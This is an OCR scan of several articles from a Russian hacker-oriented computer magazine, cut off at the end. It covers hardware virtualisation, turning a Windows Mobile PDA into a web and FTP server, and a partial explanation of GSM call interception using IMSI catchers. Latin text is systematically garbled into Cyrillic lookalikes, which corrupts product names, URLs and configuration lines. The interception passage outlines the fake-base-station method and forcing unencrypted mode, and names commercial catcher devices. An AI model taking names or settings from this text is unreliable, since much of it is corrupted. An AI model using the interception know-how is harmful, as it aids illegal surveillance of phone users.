С системными инструкциями І_АВ, І_5І_, ѴЕРВ и ѴЕРѴѴ дела об- 
стоят еще хуже, поскольку они по-разному работают в приви- 
легированном и непривилегированном режиме. В непривилеги- 
рованном режиме исключения не возбуждаются, но инструкция 
возвращает совсем не тот результат, который от нее ожидали. 
Совсем невесело, правда? 

Но даже это еще не полный перечень причин, делающих плат- 
форму х86 непригодной для эффективной виртуализации. Под- 
робнее же об этом ты можешь прочитать в статье «Ргосеесііпдз о! 
!Не 9!Н ІІЗЕІЧІХ 5есигі!у Вутрозіит», лежащей на ѵѵѵѵѵѵ.изепіх.ога/ 
еѵеп!з/зес2000/гоЫп. Іл!тІ . 
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> В линейке продуктов 
ѴѴМѵѵаге существует 
специальное приложе- 
ние, которое помогает 
переместить реально 
установленную опе- 
рационную систему в 
виртуальное окруже- 
ние. Ее имя — ѴМѵѵаге 
Р2Ѵ АззізІапЕ 




> На йѴР ты найдешь 
полную подборку про- 
грамм для организации 
виртуальных машин, в 
том числе поддержива- 
ющих аппаратную эму- 
ляцию: ХЕІ\І, ѴѴМѵѵаге, 
ѴігіиаІ Зегѵег, РагаІІеІз 
ѴѴогкзІаііоп. 

ШРО 

> Виртуальные 
выделенные серверы 
(ѴйЗ) — модная 
ныне технология. 
Подробнее о том, что 
это такое и как это ор- 
ганизовать, ты можешь 
прочесть на сайте 
ИДр://еп.ѵѵікіресІіа.огд/ 
ѵѵікіЛ/ІПиаІ бебісаіеб 
зегѵег . 
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«АППАРАТНУЮ ВИРТУАЛИЗАЦИЮ ПОДДЕРЖИВАЮТ СЛЕ 
ДУЮЩИЕ МОДЕЛИ ПРОЦЕССОРОВ: ІІЧТЕІ. РЕГМТШМ 46X2, 
РЕІЧТШМ О 9ХХ, ХЕОЫ 7ХХХ, СОРЕ йІЮ И СОРЕ 2 РІЮ, 

А ТАКЖЕ ВСЕ ПРОЦЕССОРЫ ФИРМЫ АМй, ВЫПУЩЕННЫЕ 
ПОСЛЕ МАЯ 2006 ГОДА НА СОКЕТАХ БОСКЕТ 
АМ2, БОСКЕТ $1 И БОСКЕТ Р (АТШ-ОЫ 64, ТІЛ?ІОЫ 64 
И, НАЧИНАЯ С АВГУСТА 2006, ОРТЕРОМ)» 



группа. Или можно воспользоваться готовым портом, 
просочившимся в Осла. Но смысл?! 

С поддержкой аппаратной виртуализации со сторо- 
ны процессора ХЕІЧ позволяет запускать гостевые 
системы без какой-либо их модификации (а ХЕІ\І под- 
держивает все 3 технологии виртуализации: РасіЯса, 
ѴапбегрооІ и Зііѵегѵаіе). Зачем ограничиваться ХР, ког- 
да вокруг существуют ѴізТа, Зегѵег І_опдІіогп и горячо 
любимая мной ѵѵ2к, с которой я так и не слез и слезать 
покане собираюсь. 

В роли базовой оси может выступать І_іпих, ІХеіВЗЭ или 
РгееВЗЭ (хотя последняя поддерживается в ограничен- 
ном режиме). ХЕИ входитвсоставмножествадистрибу- 
тивов, в том числе и в ЭеЫап. Существуют и коммерчес- 
кие версии ХЕІМ'а, например ЫоѵеІІ 31_Е310 или Веб На! 
ПНЕІ_5. Что же касается ѴѴіпбоѵѵз, то в список базовых 
осей, поддерживаемыхХЕІМ'ом, онаневходит, иставить 
1_|[\11)Х/1\1е!В5Э все-таки придется. Собственно говоря, 
ничего страшного в этом нет. Потом поверх него можно 
будет запустить множество гостевыхѴѴіпбоѵѵз всех вер- 
сий, какихтолько заблагорассудится. А так как сущес- 
твует специальный І_іѵе СО ( НДрУ/Ькз.хепзоигсе.сот ). 
вместо сложной установки никсов тебе достаточно 
будет взять с нашего диска ІЗО-образ, записать на 
диск и просто загрузиться с него. Сами же исходные 
тексты ХЕІМ'а лежат на его страничке ѵѵѵѵѵѵ.сі.сат.ас.ик/ 
гезеагсИ/зга/пеІоз/хеп . Как говорится, выбирай — не 
хочу. Тем более что и выбирать не из чего (почему «не 
из чего», станет понятно через несколько минут). 

О Старушка ѴМѴѴаге и все-все-все... 

Начиная с версии 5.5, ѴМѴѴаге ( ѵѵѵѵѵѵ.ѵтѵѵаге.сот ) 
поддерживает технологию аппаратной виртуализа- 
ции ѴапбегрооІ. Эта технология позволяет ей запус- 
кать 64-битные гостевые операционные системы на 
х86-процессорах. Однако для 32-битных гостей ап- 
паратная виртуализация по умолчанию выключена, 
поскольку реализована настолько криво, что вместо 
обещанного ускорения дает замедление! Подроб- 
ное разъяснение его причин можно найти в статье 
«А Сотрагізоп о! ЗоЙѵѵаге апб Нагбѵѵаге ТесІіпідиез 
Іог х86 Ѵігіиаіігаііоп», написанной двумя сотрудни- 



ками ѴМѴѴаге — Кейзом Адамсом (КеШі Абатз) и 
Олом Агесеном (ОІе Адезеп) и выложенной на 
ѵѵѵѵѵѵ.ѵтѵѵаге.сот/рбІ/азрІоз235 абатз.рбі . 

Заставить ѴМ ѴѴаге использовать аппаратную вирту- 
ализацию в принудительном порядке поможет строка 
«топііог_сопігоІ.ѵ!32 = "ТРЕІЕ"», добавленная в 
Ѵтх-файл соответствующей виртуальной машины. 
Только большой пользы от нее не будет. 

Помимо двух вышеописанных фаворитов рынка, су- 
ществует множество других эмуляторов, поддержива- 
ющих аппаратную виртуализацию или собирающихся 
сделать это в ближайшее время. 

Например, это Місгозо!! ѴігіиаІ РС (денег не просит, но 
пока ничего толком и не поддерживает), Місгозо!! ѴігіиаІ 
Зегѵег2007 (планируетподдерживатьтехнологии Расіііса 
и ѴапбегрооІ, а текущая бета МісгозоІ! ѴігіиаІ Зегѵег 
2005 Р2 ЗР1 их уже поддерживает), РагаІІеІз ѴѴогкзіаііоп 
(легкий гипервизор/монитор виртуальных машин, под- 
держивающий ѴапбегрооІ и занимающий всего 13,7 МВ 
в ѴѴіпбоѵѵз-версии и 9,7 МВ в версии, которая исполь- 
зует в качестве основной системы Ыпих). Все это удо- 
вольствие стоит чуть меньше полусотни долларов и эти 
деньги действительно оправдывает ( ѵѵѵѵѵѵ.рагаііеіз.сот и 
ѵѵѵѵѵѵ■апзѵѵе^з■сот/!оріс/ра^аIIеIз-ѵѵо^кз!а!іоп , )■ 

Также существуют экзотические супервизоры типа 
ТВАІМОО, ориентированные на решение задач реаль- 
ного времени, например обрабатывающие быстро ме- 
няющиеся показания датчиков или что-то еще. 

О Аоно надо?! 

Виртуальность — это по-настоящему крутая вещь! 
Можно экспериментировать со всеми операционными 
системами, которые только есть. Можно тянуть вирту- 
альные сети, а потом пытаться их взломать, наблюдая 
за реакцией брандмауэров и всяких прочих систем об- 
наружения вторжения. 

Раньше для реализации сетевых атак требовалось от 
трех до пяти компьютеров, теперь же достаточно одно- 
го! Причем без тормозов! Ведь самый ценный ресурс 
(не считая мозги) — это время, которого всегда не хва- 
тает. Увеличивая производительность компьютера, мы 
удлиняем нашу жизнь! И-И 
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Саундтрек к реальности 

Купи новый телефон ЗАѲЕМ ту700Х со встроенным трЗ-плеером в «Евросеть» 

и получи уникальный подарок - ВІііеІооНі-стереонаушники! 

Озвучивай каждый день так, как тебе хочется! Создавай свой саундтрек к реальности. 



© ЗАО ЕМ 

Мир, созданный тобой 










МАКСИМ «МАХІК02» ПАРШУКОВ 



НЕОБЫЧНОЕ ИСПОЛЬЗОВАНИЕ КАРМАННОГО КОМПЬЮТЕРА: ДЕЛАЕМ ИЗ НЕГО СЕРВЕР! 

ВОТ ЗАДУМАЙСЯ. КАК ИСПОЛЬЗУЕТ КПК ЕПО РЯДОВОЙ ОБЛАДАТЕЛЬ? ЧИТАЕТ В ДОРОГЕ ЭЛЕКТРОННЫЕ ВЕРСИИ КНИЖЕК, СЛУШАЕТ МУ- 
ЗЫКУ, РАБОТАЕТ С ЛИЧНЫМ ПЛАНИРОВЩИКОМ, НУ, И ИПРАЕТСЯ В ПРОСТЫЕ ЛОПИЧЕСКИЕ ИПРУШКИ. ВСЕ! ТОРДА ЗАЧЕМ ВСЕ ЭТИ СО- 
ТНИ МЕПАПЕРЦ, БАСНОСЛОВНОЕ УВЕЛИЧЕНИЕ ОПЕРАТИВНОЙ ПАМЯТИ, САМЫЕ РАЗНЫЕ СЕТЕВЫЕ ИНТЕРФЕЙСЫ? ПОЛУЧАЕТСЯ, ВСЕ 
ЗРЯ? А ВОТ И НЕТ. МЫ ПОПРОБУЕМ ОТОЙТИ ОТ ВСЕХ ЭТИХ СКУЧНЫХ СТЕРЕОТИПОВ И ЗАМУТИМ НА КПК САМЫЙ НАСТОЯЩИЙ СЕРВЕР, 
А ПОТОМ ДАЖЕ ЗАЩИТИМ ЕПО ОТ ВЗЛОМА. ДУМАЕШЬ, ЭТО НЕ РЕАЛЬНО? ПРИЯТЕЛЬ, ТЫ ОШИБАЕШЬСЯ. 



абегая вперед, скажу, что для мо- 
бильной платформы существуют 
практически любые демоны из 
тех, которые устанавливают на 
обычный компьютер. Функционально они не- 
сколько уступают «настольным» собратьям, 
зато с точки зрения безопасности они даже 
более устойчивы ко взлому. Попробуй найди 
эксплоит для столь редкого ПО... Впрочем, 
давай сначала разберемся, как все это будет 
работать. Идея проста: поскольку подклю- 
чить патчкорд непосредственно к КПК нельзя, 



требуется промежуточное звено — обычный 
компьютер. В данном случае нам абсолютно 
неважны его конфигурация, установленная 
ОС и религия администратора. Главное, что- 
бы на него был монтирован беспроводной ин- 
терфейс, позволяющий соединиться с КПК, а 
сам он имел доступ в сеть. После соединения 
по ѴѴіРі карманник также доступен из сети, а 
именно это нам и нужно. Возможно, кто-то 
резонно заметит, что в тех же целях можно 
было бы использовать встроенный ОРВ5- 
модуль или ЫиеіооФ. Но спешу парировать 



тем, что ОРВЗ в КПК встречается довольно 
редко, а скорость по «синему зубу» все равно 
будет ниже, чем по ѴѴіРі. Правда, можно обой- 
тись без компьютера, если у тебя есть точка 
доступа, но дома она встречается нечасто, 
зато беспроводные интерфейсы вовсю ин- 
тегрируют в материнские платы. 

□ ѴѴіРі на компьютере — это просто! 

Итак, решено — будем использовать ѴѴіРі. 
Начнем, конечно же, с того, что поднимем 
между компьютером и КПК беспроводное 
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соединение. Для наглядности будем счи- 
тать, что в качестве компьютера выступает 
ноутбук, оснащенный РСМСІА ѴѴіРі картой 
ЫЕТОЕАЯ СагбВиз МА521, а в качестве ОС 
используется родная ѴѴіпбоѵѵз ХР. Отваж- 
ным добровольцем со стороны карманных 
компьютеров будет проверенная временем 
машинка РЭА ЭеІІ Ахіт ХЗі (ОС — ѴѴіпбоѵѵз 
тоЫІе 2003) с интегрированным ѴѴіЕі-моду- 
лем стандарта 802. 11Ь. Не будем замора- 
чиваться по поводу установки драйверов и 
тому подобного — все это сейчас принципи- 
ального значения не имеет. Для беспровод- 
ного соединения сейчас важно установить 
параметры ТСР/ІР-протокола, которые за- 
даются, как и для обычного сетевого под- 
ключения. Просто заходим в его свойства 
и проверяем, установлены ли ІР-адрес и 
маска подсети. Если нет, указываем в качес- 



тве ІР-адреса 192.168.0.1, а маски подсети 
— 255.255.255.0. Далее задаем параметры 
беспроводной связи стандартными средства- 
ми винды или софта, который идет в комплек- 
те с твоей карточкой. Допустим, мы выбрали 
первый вариант, тогда требуется указать: 
Сетевое имя (5510) — произвольное название 
сети. 

Проверке подлинности — в нашем случае на- 
илучшим образом подойдет «совместная». 
Шифрование данных — ѴѴЕР. 

Ключ предоставлен автоматически — мы бу- 
дем использовать статический ключ, поэто- 
му отключаем эту опцию. 

Ключ сети — вводим произвольный ѴѴЕР-кпюч, 
который будет использоваться для защиты 
беспроводного соединения. 

Далее, поскольку в нашем случае соединение 
будет осуществляться без использования 
точки доступа, отмечаем соответствующую 
опцию «Это прямое соединение «компью- 
тер-компьютер», точки доступа не использу- 
ются». А чтобы не парить себе мозг с ручной 
установкой соединения, включаем автома- 
тический реконнект с помощью параметра 
«Подключаться, если сеть находится в радиу- 
се действия». Затем щелкаем в трее по икон- 
ке беспроводного соединения и убеждаемся, 
что с ним все о'кей. 

В принципе, соединение с КПК можно уста- 
новить уже сейчас, но тот по-прежнему не 
будет иметь доступа в инет, а значит, толку 
от такого соединения пока мало. Необхо- 
димо поднять так называемый ІЧАТ (ІЧеІѵѵогк 
Аббгезз Тгапзіаііоп) — трансляцию сетевых 
адресов, позволяющую компьютерам в ло- 
калке работать в инете через единственный 
сервер, как если бы они сами имели доступ 
в Сеть. Работая с ѴѴіпбоѵѵз ХР, можно пойти 
двумя путями, и оба будут предельно про- 
сты. Я предлагаю тебе воспользоваться 
специальным «Мастером домашней сети», 
который легко вызывается через окно «Се- 
тевые подключения». Шустрый помощник 
автоматически обнаружит все сетевые под- 
ключения и, скорее всего, будет ругаться, 
что беспроводное отключено, поскольку 
непосредственно коннект еще не установ- 
лен. Не обращай на это внимание, а просто 
поставь галочку «Игнорировать отключен- 
ное сетевое оборудование». А дальше по- 
мощникзадаст простой вопрос: ачто, собс- 
твенно, нужно сделать? А нужно настроить 
выход в интернет других пользователей че- 
рез этот компьютер — это первый вариант 
ответа, его и выбирай. Далее обозначь вне- 
шнее соединение (с инетом), а также внут- 



реннее (в нашем случае — беспроводное). 
И вот только теперь можешь считать пред- 
варительную настройку законченной. 

□ А на КПК — еще проще 

Теперь попробуем настроить ѴѴіРі с другой 
стороны, то есть на КПК. Берем в руку стилус и 
ищем в верхней части экрана символическую 
иконку со стрелочками и крестиком. Удалось? 
Тогда можем приступать к поиску беспровод- 
ных соединений — кликаем по «Тигп оІІ ііідбі 
тобе». Через некоторое время КПК обнару- 
жит нашу сеть (причем вполне возможно, что 
еще и какую-нибудь другую) и предложит к ней 
подключиться. Для этого потребуется ввести 
ѴѴЕР-ключ, который ты ранее указал на ком- 
пьютере. Если все сделано правильно, связь 
между компьютером и КПК тут же будет оста- 
новлена. Наш будущий сервер получит произ- 
вольный ІР-адрес, выданный ЭНСР-сервером 
на компьютере, но такое положение дел нас 
не устраивает по одной простой причине: мы 
настраиваем сервер. Нужен статический ІР! 
Так что, недолго думая, переходим в Настрой- 
ки -> Соединения -> Сетевые Адаптеры -> 
Закладка ІЧеІѵѵогк Абаріегз. В списке сетевых 
адаптеров выбираем беспроводной модуль 
(в моем случае это ЭеІІ ТМ 1 200 \А/1_АЫ Мобиіе) 
и смотрим на доступные настройки. Выста- 
ви в качестве ІР-адреса что-нибудь, вроде 
1 92. 1 68.0.2, и приступай к следующему этапу 
настройки. 

□ Поднимаем веб-сервер 

Итак, соединение между узлами установ- 
лено, пакетики лихо передаются по воздуху, 
предоставляя КПК доступ в интернет. Дело за 
малым — поднять все необходимые демоны, 
чем мы сейчас и займемся, начав с веб-демо- 
на. Решений для КПК совсем немного, но зато 
есть по-настоящему продуманные продукты, 
такие как Роскеі НРН Зегѵег 5.0, например. 
Демон не только выполняет функции про- 
стейшего веб-сервера, но отлично ладит с 
РНР-скиптами и даже ЗСОеЗ. Установка про- 
ходит по обычному сценарию через знакомый 
тебе МісгозоЙ АсііѵеЗупс. Впрочем, можно 
обойтись и без него, скопировав вручную нуж- 
ные саЬ-файлы в память КПК, хотя смысла в 
подобных ухищрениях я не вижу. Разработ- 
чики попытались максимально приблизить 
свой продукт к обычному серверному софту. 
Поэтому никаких ОШ-оболочек для настройки 
здесь нет. Как и подобает серьезным продук- 
там, используется текстовый конфигураци- 
онный файл НРН.іпі, расположенный в папке 
ХРгодгат РіІезХРоскеіНРН Зегѵег. Только вот 
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> Статус РТР-сервера 
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> Настройки ѴѴіРі на КПК 




пеІ/ИрІі — вѳб-сѳрвер 
РоскеІ НРН Зегѵег 
ИПр://ѵѵѵѵѵѵ.поІ5еПе- 
воПѵѵаге.сот/ргосІисІв/ 
роскеІрс/ЗІіагеІІ — 
ЗИагѳІі РТР зегѵег Іог 
МісгозоЙ РоскеіРС 
ѵѵѵѵѵѵ.кегіо.сопп — Кегіо 



ѴѴІпгоіЛе РігеѵѵаІІ 



ѵѵѵѵѵѵ.аігзсаппег . 
сот/тоЫІе — файрвол и 
антивирус 

ѵѵѵѵѵѵ.зоіі.пеі — Роскеі 
СопігоІІег-РгоІеззіопаІ 



ѵѵѵѵѵѵ.іасіозіікі.пеі: — 



полезный портал для 
пользователей КПК 




> Ріа диске ты найдешь 
подборку программ, 
упомянутых в статье, 
а в самых ближайших 
выпусках мы даже 
откроем новый раздел 
— «Софт для мобильных 
устройств» 



количество опций в нем ничтожно мало — не дорос еще 
малютка до серьезных проектов. Но в нашем случае это 
даже лучше, тебе нужно указать лишь следующее: путь к 
ѴѴѴѴѴѴ-документам (там, где хранятся файлы веб-сайта) — 
ХРгодгат РіІезХРоскеІНРН ЗегѵеіЛѵѵѵѵѵѵ; адрес и порт, на ко- 
тором будет висеть демон: НДр://1 27.0.0.1 :9000; адрес веб- 
панели, предназначенной для удаленного мониторинга 
сервера: ИДр://1 27.0.0. 1 :9000/зіаіиз. 

При необходимости откорректируй значение нужных 
параметров и запускай демон через меню: Программы 
-> РоскеіНРН Зегѵег. Проверить работоспособность сер- 
вера и интерпретатора РНР можно, поместив тестовый 
скрипт в папку с файлами веб-сервера. Создай там, на- 
пример, туіезі.рМр, напиши единственную строчку кода 
« <?есИо 5+5?> » и попробуй обратиться локально по адресу 
ИДр://1 27.0.0. 1:9000/туіезІрІір. 

Поскольку твой КПК находится за маршрутизатором 
(ІМАТ’ом), то обратиться к нему напрямую из внешней Сети 
(то есть из инета) нельзя. Клиент извне может подключиться 
исключительно к маршрутизатору, но никак не к клиенту, 
который находится за фаерволом. Поэтому придется пойти 
на небольшую хитрость и организовать роіі тарріпд или, 
проще говоря, переадресацию запросов, поступающих на 
80-ый порт ноутбука (то есть маршрутизатора), на 9000-ый 
портуже КПК. Для этой функции вполне подойдет мощный, 
но простой в использовании Кегіо ѴѴіпгоиіе РігеѵѵаІІ. 

□ РТР-демон, почему нет? 

Веб-сервер мы сделали, теперь ты не только сможешь 
поднять свой небольшой порносайт, но и, например, отла- 
живать реальные РНР-скрипты. Идем дальше. Предлагаю 
не обламываться и в довесок к веб-серверу организовать 
еще и небольшой РТР'шник. Поиски подходящего софта 
привели меня к отличной программе — ЗНагеІі РТР зегѵег 
Рэг МісгозоЙ Роскеі РС. После установки необходимо запус- 
тить приложение через Старт -> Программы-> ЗНагеІі РТР. 
При этом в трее карманника появляется иконка РТР-серве- 
ра, вызывающая панель для администрирования сервера. 
Хочешь отследить активность? Нет проблем: в окне отобра- 
жается время беспрерывной работы, количество активных 
сессий, объем переданного и принятого трафика в мегабай- 
тах. Конфигурирование осуществляется через понятную 
графическую оболочку. Причем, как и в старшем собрате 
(существует версия этого демона и для обычной ѴѴіпсІоѵѵз- 



платформы), в ЗНагеІі РТР предусмотрены возможность 
задать максимальное количество одновременных подклю- 
чений, порт, на котором будет работать демон, таймаут 
для сессий, а также реализована многопользовательская 
система с дифференцированными квотами и уровнями 
доступа с аутентификацией не только по имени/пользо- 
вателю, но и по ІР. Тут же доступны и настройки, касающи- 
еся производительности сервера. Для увеличения скоро- 
сти передачи рекомендую выбрать достаточную степень 
компрессии, а самому серверу выделить достаточное 
количество памяти и подходящую степень питания, чтобы 
сервер не сдох от 10-ти подключений или не вырубился 
вообще в связи с отсутствием активности пользователя. 

О Наш долг — обеспечить безопасность... 

Как это сделать? Для начала нужно спрятать КПК в сейф, 
записать код на бумажке и от греха подальше сжечь ее (или 
съесть — кому что нравится). Только в этом случае можно 
гарантировать физическую безопасность сервера. Правда, 
если вдруг окажется, что через бронированные стенки ящи- 
ка сигнал ѴѴіРі не проходит, то его сервисами уже, к сожа- 
лению, не воспользоваться. Но зато какая безопасность от 
удаленных атак! Подобного уровня едва ли можно добиться 
другими способами, но приблизиться к нему под силу и без 
столь радикальных мер. Например, с помощью фаервола. 
Ты опять удивляешься, что его можно заинсталлить на КПК? 
А разве карманник не достоин этого, чем он хуже? 
Добротным решением для карманных компьютеров являет- 
ся Аігзсаппег МоЬіІе РігеѵѵаІІ. Сразу после простой установки 
через АсііѵеЗупс ты получаешь недюжинные возможности 
по фильтрации трафика вкупе с простейшей настройкой. 
Брандмауэр работает в трех режимах: полного доверия, 
когда все приложения имеют доступ в Сеть, полного запре- 
та, когда доступ в инет полностью запрещен, а также так 
называемый осторожный режим, запрещающий все со- 
единения, которые не разрешены. Правила, разрешающие 
сетевую деятельность тех или иных приложений, настраи- 
ваются в ручную. Для этого в окне выбора режима следует 
нажать кнопку «ЕсІіК Важно, что Аігзсаппег также позволя- 
ет мониторить активные сетевые соединения твоей карман- 
ной машинки в реальном времени с указанием протокола, 
локального адреса, порта, адреса и прочих параметров 
соединения. Всю сетевую деятельность карманника можно 
записывать в лог для последующего анализа. Дополнитель- 
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ные возможности фаервола позволяют 
защитить твой КПК от атак типа ООоЗ, опреде- 
лив максимальное количество передаваемых 
ІСМР-, ТОР- и ІЮР-пакетов в секунду. В случае 
превышения установленного количества, ІР- 
адрес флудера будет блокироваться. Но это 
еще не все. Чтобы защитить себя еще и от мал- 
вари со всеми ее червями и вирусами, которые 
в последнее время активно разрабатываются 
и для мобильных платформ, рекомендую про- 
грамму от тех же разработчиков — Аігзсаппег 
МоЬіІе Апііѵігиз. Антивирус быстро просканит 
КПК на предмет опасных файлов, предвари- 
тельно обновив антивирусные базы с сайта 
производителя. 

ЕЗ Удаленное администрирование 

Обычные серверы, поддерживающие работу 
сайтов, РТР-архивов, ОЫ8 и ОНСР и других 
сетевых сервисов, расположены в специаль- 
ных помещениях — серверных. Но админ там 
находится далеко не всегда: благодаря средс- 



твам удаленного управления в этом попросту 
нет необходимости. Раз настроив аппаратную 
часть, намного удобнее использовать средс- 
тва удаленного администрирования, а не мер- 
знуть под многочисленными (мечты-мечты!) 
кондиционерами. Карманные компьютеры 
также могут похвастаться подобным функцио- 
налом. Пакет Роскеі Соп^гоІІег-РгоіеззіопаІ де- 
лает возможным установку на КПК серверной 
части приложения, а на компьютер — клиент- 
ской, после чего управлять портативной иг- 
рушкой удаленно можно даже из другой части 
мира. Так карманный компьютер может стать 
вовсе не карманным — его можно положить 
в удобное место и настраивать все необходи- 
мое через компьютер, не прибегая к помощи 
стилуса. В этом плане РоскеІ СопІігоІІег — на- 
стоящая находка, которая предлагает массу 
фишек, начиная от функции удаленного рабо- 
чего стола и заканчивая доступом к файловой 
системе КПК. Помимо этого, ты получишь до- 
ступ к командной строке и даже возможность 



управлять процессами. Полезнейшим добав- 
лением является система макроскриптов, с 
помощью которых можно быстро запрограм- 
мировать последовательность рутинных опе- 
раций на КПК и в следующий раз выполнять их 
двумя кликами мыши. И еще! 

Любые действия на карманнике можно запи- 
сать в видеофайл, а это может быть полезно 
хотя бы для того, чтобы снять видеоурок для 
нашего ѴізиаІ Наск++. 

□ Стереотипам — нет! 

Какова метаморфоза, а? Из самого обыч- 
ного КПК, который годился ранее разве что 
для чтения книг и воспроизведения музыки, 
мы сотворили настоящего сетевого монс- 
тра с полноценными фаерволом, удаленным 
управлением и работающими ѴѴѴѴѴѴ-, РТР-де- 
монами. Существует мнение, что КПК — это 
бесполезная игрушка, которая ни на что не 
годится. Сегодня мы сломали этот стереотип, 
дерзай! ЭЕ 
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ЧИТАЙТЕ 
В ДЕКАБРЬСКОМ 
НОМЕРЕ! 

БЕЗОПАСНОСТЬ ѴѴІІѴЮОѴѴЗ: 
СЕКЬЮРНОЕ ШЛЮЗОВАНИЕ 
КОВЫРЯЕМ .ЫЕТ ВЕМОТІЫС 
БЕЗОПАСНОСТЬ СЛУЖБ .ЫЕТ 
НОВОЕ СВѴРТОАРІ 
СВЕЖИЕ БАГИ ѴѴІЫООѴѴЗ ХР 
ѴІЗТА КЕВЫЕІ_ ВОМВІЫС 
ВСКРЫВАЕМ СЕТЕВОЙ СТЕК 
ОБХОДИМ РАТСНСІІАВО 
БРОНИРУЕМ БЕСПРОВОДНЫЕ КЛИЕТНЫ 
ЛОМАЕМ ЧЕРЕЗ ФЛЕШКУ 

ѴѴІІѴЮОѴѴЗ ѴІЗТА ЕХТВЕМЕ ТЕЗТ 
ОТ КРИСА КАСПЕРСКИ: 

25 ЭКСКЛЮЗИВНЫХ СТРАНИЦ 
ПРО Х-ИССЛЕДОВАНИЕ ВИСТЫ САМЫМ 
ЗНАМЕНИТЫМ МЫЩЪХОМ 
КОМПЬЮТЕРНОГО МИРА 
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ВАС ВНИМАТЕЛЬНО 
СЛУШАЮТ 



ІСКРЫТЫЕ АСПЕКТЫ БЕЗОПАСНОСТИ В 65М-СЕТЯХІ 



МЫ ИЗО ДНЯ В ДЕНЬ БЕРЕМ С СОБОЙ МОБИЛ ЬНЫЙ ТЕЛ ЕФОН, ИСПОЛЬЗУЕМ ЕГО НА ВСЮ КАТУШКУ, ИНТЕРЕСУЕМСЯ НОВИНКАМИ ТЕ- 
ЛЕФОНОВ И ПРИБАМБАСАМИ К НИМ. НО ПРИ ЭТОМ ПОРОЙ НЕ ПОДОЗРЕВАЕМ О ТОЙ ОПАСНОСТИ, КОТОРУЮ ОН НЕСЕТ. МАЛО КТО ЗНА- 
ЕТ, ЧТО ЗВОНКИ ПО СОТОВОМУ МОЖНО ПЕРЕХВАТИТЬ И ПРОСЛУШАТЬ, МЕСТОРАСПОЛОЖЕНИЕ АБОНЕНТА - С БОЛ ЬШ ОЙ ТОЧНОСТЬЮ 
ОПРЕДЕЛИТЬ, А ПРИВАТНЫЕ ДАННЫЕ -ИЗВЛЕЧЬ ИЗ ТЕЛЕФОНА, ДАЖЕ ЕСЛИ ОНИ БЫЛ И СТЕРТЫ И ЗАПАРОЛ ЕНЫ. ВО ДЕЛА! 



ачать стоит с того, что возмож- 
ности прослушать разговоры 
и определить как минимум при- 
мерное месторасположение 
абонента заложены в технологию сотовых 
сетей изначально. Это действительно так. 
С учетом масштабов, которые имеет сегод- 
ня терроризм, быть по-другому попросту 
не может. Спецслужбы прибегают к самым 
различным способам, чтобы оградить стра- 
ну от нападений, и одной из действующих 
мер является прослушивание телефонных 



звонков. Вспомнить хотя бы систему СОМР, 
предназначенную для авторизированного 
поиска подозрительных звонков и электрон- 
ной корреспонденции. В ее основе лежит 
огромный программно-аппаратный комп- 
лекс, разработанный в недрах НИИ служб 
безопасности. Гигантские объемы пере- 
хваченной информации анализируются по 
ключевым словам с помощью специальной 
экспертной системы, а в случае голосового 
трафика обрабатываются еще и голосовы- 
ми триггерами, настроенными на опреде- 



ленный тембр. И сильно ошибается тот, кто 
считает, что разговоры по мобильнику че- 
рез эту систему не проходят. Скорее всего 
все иначе. 

□ А слушают вас так... 

Любая технология сотовой связи использу- 
ет для передачи данных радиоэфир, а зна- 
чит, мы имеем дело с теми же проблемами 
безопасности, что и ѴѴіРі/ВІиеіооіШ В пер- 
вую очередь, это возможность перехвата 
и дешифровки пакетов с голосовыми дан- 
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>Уникальный скрин с программы управления ЕМ5І-саІсИегом. Впечатляет! 




> Криптофон — попробуй отличи от 
привычного сотика! 



ными. Аналоговые системы сотовой связи, 
такие как ЫМТ, АМР5, ЭАМРЗ, вообще про- 
слушиваются обычным радиоприемником, 
слегка модифицированным под сканер и 
работающим в частотном диапазоне сото- 
вой сети. В случае с ОЗМ такого беспреде- 
ла естественно нет, поскольку все данные в 
таких сетях передаются в зашифрованном 
по алгоритмам А5 виде. Причем конкретно 
в России шифрование в большинстве сво- 
ем осуществляется по алгоритму А5/2, хотя 
во всех передовых странах задействован 
намного более стойкий к дешифровке А5/1. 
Впрочем, это не имеет большого знания 

— оба алгоритма давно рассекречены и, 
что еще более важно, взломаны. Расшиф- 
ровать данные для обычного компьютера 

— задача пока непосильная, но зато впол- 
не реализуемая на мощных мэйнфреймах и 
распределенныхсистемах. Получается, что 
единственной проблемой восуществлении 
прослушки остается перехват голосового 
трафика из эфира, и она также решаема! 
Даже в интернете и особенно на закрытых 
форумах нередко попадаются сообщения 
о промышленном шпионаже и прослушке 
мобильных телефонов. Таить здесь особо 
нечего: либо у представителя сервиса есть 
друг детства в органах, либо он обладает 
подходящей техникой. 

Как ни странно, но на практике это реали- 
зуется довольно просто. И все из-за того, 
что в спецификации ОЗМ заложена иденти- 
фикация абонента в сети, осуществляемая 
посредством ЗІМ-карты, но не предусмот- 
рена авторизация самой сети! Понимаешь? 
Можно создать свою собственную базовую 
станцию с сигнал ом выше, чем у настоя щей, 



и аппаратжертвы, ничего не подозревая, к 
ней подключится! А если передавать весь 
трафик дальше, то есть настоящей базо- 
вой станции, то никто — ни оператор, ни 
абонент — не заметит подлога и все разго- 
воры будут продолжаться своим чередом. 
Получаем типичный пример атаки Мап- 
Іп-ТИе-МісІсІІе. Девайсы, выступающие в 
качестве фейковой базовой станции, на- 
зываются ЕМЗІ-саІсЬег’ами и работают по 
тому же принципу, что и логирующий прок- 
си в ѵѵеЬ. Такое название неслучайно. Каж- 
дый пользователь в сетях ОЗМ имеет свой 
уникальный идентификатор абонента ІМЗІ 
(ІпіегпаііопаІ МоЬіІе ЗиЬзсгіЬег ІбепШу), с 
помощью которого можно отделить голо- 
совой трафик нужного человека от других. 
При этом в некоторых случаях можно не 
зацикливаться на расшифровке трафика, 
а посредством специальных команд заста- 
вить абонента вообще не использовать 
шифрование (в этом случае данные коди- 
руются по алгоритму А5/0), а значит, все, 
что требуется, — это перевести цифры в 
аудиоданные. Большинство ЕМЗІ-кэтче- 
ровтаки работают. 

Использование подобного рода обору- 
дования самотеком — это, безусловно, 
преступление. Но кто его расследовани- 
ем будет заниматься, когда такие темы ты 
можешь приобрести из-под полы, либо 
заказать у диллеров в Сети. Наиболее хо- 
довые продукты: Осіориз РТМВЗ 600 тіпі, 
РозіѴѴіп, ОЗМ Іпіегсеріог Рго, ЗСЬ-5020. 

В итоге ясно, что прослушка мобильника 
осуществима государственными силовы- 
ми структурами, иностранными спецслуж- 
бами, обладателями ІМЗІ-саісЬег’а, атакже 



ОЗМ-сканеров, настроенных на диапазон 
частот, где та или иная мобильная сеть ра- 
ботает без шифрования. Кстати, понять, 
задействован режим шифрования или нет, 
